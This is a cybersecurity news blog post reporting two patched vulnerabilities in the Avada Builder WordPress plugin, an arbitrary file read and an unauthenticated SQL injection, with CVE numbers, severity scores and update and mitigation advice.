Skip to content
  • Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form
Over 1 Million WordPress Sites Vulnerable to Avada Plugin Flaws

Over 1 Million WordPress Sites Vulnerable to Avada Plugin Flaws

Posted on May 18, 2026 By CWS

A critical security alert has been issued for the Avada Builder WordPress plugin, which is used by more than one million websites. Two vulnerabilities in the plugin could be exploited by attackers to access sensitive data and server files.

Details of the Avada Builder Vulnerabilities

Security experts have identified vulnerabilities in Avada Builder that could be actively targeted if not patched. These flaws, found by researcher Rafie Muhammad through the Wordfence Bug Bounty Program, include an arbitrary file read vulnerability (CVE-2026-4782) and a SQL injection flaw (CVE-2026-4798).

The vulnerabilities affect Avada Builder versions up to 3.15.2 and 3.15.1, respectively, necessitating an immediate update to ensure site security.

Arbitrary File Read Risk

The first vulnerability allows authenticated users with minimal access, such as subscribers, to read sensitive server files. This issue arises from inadequate validation of the “custom_svg” parameter within a shortcode, permitting attackers to access critical files like wp-config.php. This file contains database credentials and security keys essential for site security.

Given a CVSS score of 6.5, this vulnerability is considered medium severity but poses a high practical risk due to the exposure of sensitive information.

SQL Injection Threat

The second vulnerability, rated more severe with a CVSS score of 7.5, permits unauthenticated attackers to execute time-based SQL injection attacks using the “product_order” parameter. This flaw stems from insufficient sanitization of database queries, allowing malicious SQL commands to be injected.

Attackers can exploit this to extract sensitive data, like user credentials, from the database, especially if WooCommerce was previously installed and later disabled. The Avada development team has released updates to address these vulnerabilities, culminating in version 3.15.3 on May 12, 2026. Site owners should immediately update to this version or later.

Steps to Mitigate Risks

To safeguard against these vulnerabilities, it is vital for Avada Builder users to update to the latest version. Additionally, reviewing user roles to eliminate unnecessary subscriber accounts and monitoring logs for unusual database queries or file access can enhance security.

Employing a web application firewall, such as Wordfence, offers an extra layer of protection against potential exploits.

Conclusion

This incident underscores the importance of regularly auditing even widely trusted plugins, as they can introduce significant security risks. With a vast number of installations, the Avada Builder plugin presents an attractive target for hackers. Site owners must remain vigilant and ensure timely patching to protect their WordPress websites from exploitation.

Cyber Security News Tags:Avada Builder, CVE-2026-4782, CVE-2026-4798, file read vulnerability, plugin vulnerabilities, security flaws, SQL injection, web security, website security, Wordfence, WordPress

Post navigation

Previous Post: Grafana Suffers Data Breach, Codebase Stolen
Next Post: Critical Windows Flaw Allows SYSTEM Privilege Escalation

Related Posts

Detecting and Remediating Misconfigurations in Cloud Environments Detecting and Remediating Misconfigurations in Cloud Environments Cyber Security News
Critical Ivanti Endpoint Manager Vulnerabilities Let Attackers Execute Remote Code Critical Ivanti Endpoint Manager Vulnerabilities Let Attackers Execute Remote Code Cyber Security News
AI Pentest Tool Enhances Security Testing with New Features AI Pentest Tool Enhances Security Testing with New Features Cyber Security News
Cisco IOS 0-Day RCE Vulnerability Actively Exploited in the Wild Cisco IOS 0-Day RCE Vulnerability Actively Exploited in the Wild Cyber Security News
eScan Antivirus Update Server Hacked to Push Malicious Update packages eScan Antivirus Update Server Hacked to Push Malicious Update packages Cyber Security News
Criminal IP to Showcase ASM and CTI Innovations at GovWare 2025 in Singapore Criminal IP to Showcase ASM and CTI Innovations at GovWare 2025 in Singapore Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • Fake Installers Deploy SharkLoader Malware in Networks
  • Critical Vulnerabilities in FatFs Impact Millions of Devices
  • Hackers Exploit Blogspot and PowerShell for Data Theft
  • Critical Linux Kernel Bug Allows Unauthorized Root Access
  • Nebula’s AI-Powered Security Tool Revolutionizes Testing

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • July 2026
  • June 2026
  • May 2026
  • April 2026
  • March 2026
  • February 2026
  • January 2026
  • December 2025
  • November 2025
  • October 2025
  • September 2025
  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • Fake Installers Deploy SharkLoader Malware in Networks
  • Critical Vulnerabilities in FatFs Impact Millions of Devices
  • Hackers Exploit Blogspot and PowerShell for Data Theft
  • Critical Linux Kernel Bug Allows Unauthorized Root Access
  • Nebula’s AI-Powered Security Tool Revolutionizes Testing

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Copyright © 2026 Cyber Web Spider Blog – News.

Powered by PressBook Masonry Dark